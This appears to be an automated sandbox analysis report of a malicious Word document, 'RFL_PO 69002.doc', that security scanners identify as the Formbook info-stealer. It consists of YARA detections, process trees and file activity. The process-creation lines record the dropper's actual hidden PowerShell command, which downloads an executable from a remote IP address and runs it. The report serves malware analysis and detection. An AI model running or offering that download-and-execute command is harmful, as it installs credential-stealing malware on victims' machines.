Source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.nothinglittle.exe.423b160.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.nothinglittle.exe.423b160.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 28.2.nothinglittle.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 28.2.nothinglittle.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 28.0.nothinglittle.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 28.0.nothinglittle.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 28.0.nothinglittle.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 28.0.nothinglittle.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 28.2.nothinglittle.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 28.2.nothinglittle.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: nothinglittle.exe.9.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@8/13@0/1

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3492:120:WilError_01

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\{BCE875CA-B705-4E9B-879E-D1A9B6F412E9} - OProcSessId.dat

Jump to behavior

Source: RFL_PO 69002.doc

OLE indicator, Word Document stream: true

Source: RFL_PO 69002.doc

OLE document summary: title field not present or empty

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: RFL_PO 69002.doc	Virustotal: Detection: 15%
Source: RFL_PO 69002.doc	ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\Public\Documents\nothinglittle.exe C:\Users\Public\Documents\nothinglittle.exe
Source: C:\Users\Public\Documents\nothinglittle.exe	Process created: C:\Users\user\AppData\Local\Temp\nothinglittle.exe C:\Users\user\AppData\Local\Temp\nothinglittle.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h Start-BitsTransfer -Source 'http://31.210.20.45/1xBet/RFL_0769002.exe' -Destination 'C:\Users\Public\Documents\nothinglittle.exe';C:\Users\Public\Documents\nothinglittle.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\Public\Documents\nothinglittle.exe C:\Users\Public\Documents\nothinglittle.exe	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process created: C:\Users\user\AppData\Local\Temp\nothinglittle.exe C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000001D.00000000.488460659.0000000006560000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: nothinglittle.exe, 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: nothinglittle.exe
Source:	Binary string: wscui.pdb source: explorer.exe, 0000001D.00000000.488460659.0000000006560000.00000002.00000001.sdmp

Data Obfuscation:

Yara detected Costura Assembly Loader

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000008.00000003.269897366.00000246F5519000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.275702172.0000000000D12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.431614413.00000000007D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.433940811.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.491282271.00000000007D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.269964305.00000246F5559000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.432793873.0000000000D12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.270059630.00000246F555A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.430227602.0000000001416000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.432322254.00000000007D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nothinglittle.exe PID: 6988, type: MEMORY
Source: Yara match	File source: Process Memory Space: nothinglittle.exe PID: 6172, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe, type: DROPPED
Source: Yara match	File source: 9.2.nothinglittle.exe.d10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.nothinglittle.exe.d10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.nothinglittle.exe.7d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.nothinglittle.exe.7d0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.nothinglittle.exe.7d0000.0.unpack, type: UNPACKEDPE

Source: nothinglittle.exe.9.dr

Static PE information: 0xD669075E [Tue Dec 28 08:16:30 2083 UTC]

Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_03024E5C pushad ; iretd	9_2_03024E5D
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_03025265 push ecx; retf	9_2_0302526C
Source: C:\Users\Public\Documents\nothinglittle.exe	Code function: 9_2_030262B5 push 8BFFFFFEh; retf	9_2_030262BB
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_00417B68 push ebx; ret	28_2_00417B69
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041CEB5 push eax; ret	28_2_0041CF08
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041CF6C push eax; ret	28_2_0041CF72
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041CF02 push eax; ret	28_2_0041CF08
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0041CF0B push eax; ret	28_2_0041CF72
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_004167E2 push esi; retf	28_2_004167F5
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0040C78D push ecx; iretd	28_2_0040C78E
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012DD0D1 push ecx; ret	28_2_012DD0E4
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0126322C push eax; retf	28_2_0126321C
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01269271 push es; iretd	28_2_01269278
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0126427E pushad ; retf 000Dh	28_2_0126427F
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0126225E push eax; retf	28_2_0126321C
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01264288 pushad ; retf	28_2_01264289
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0126A7C0 push es; iretd	28_2_0126A7C1
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01263F9F pushad ; ret	28_2_01263FA0

Source: initial sample

Static PE information: section name: .text entropy: 7.99300765862

Source: C:\Users\Public\Documents\nothinglittle.exe

File created: C:\Users\user\AppData\Local\Temp\nothinglittle.exe

Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
